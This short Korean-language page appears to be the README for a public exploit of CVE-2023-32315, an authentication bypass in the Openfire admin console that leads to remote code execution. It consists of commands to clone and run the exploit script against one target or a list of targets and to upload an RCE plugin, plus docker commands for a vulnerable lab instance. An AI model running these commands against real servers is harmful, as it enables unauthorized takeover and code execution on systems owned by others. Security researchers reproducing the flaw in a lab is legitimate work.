
Openfire 콘솔 인증 우회 취약점 (RCE 플러그인 포함)
RCE 플러그인을 포함한 Openfire 콘솔 인증 우회 취약점
git clone https://github.com/miko550/CVE-2023-32315.git
cd CVE-2023-32315
pip3 install -r requirements.txt
python3 CVE-2023-32315.py -t http://127.0.0.1:9090
python3 CVE-2023-32315.py -l lists.txt
openfire-management-tool-plugin.jar 플러그인 업로드docker pull nasqueron/openfire:4.7.1
sudo docker run --name openfire -d --restart=always --publish 9090:9090 --publish 5222:5222 --publish 7777:7777 --volume /srv/docker/openfire:/var/lib/openfire nasqueron/openfire:4.7.1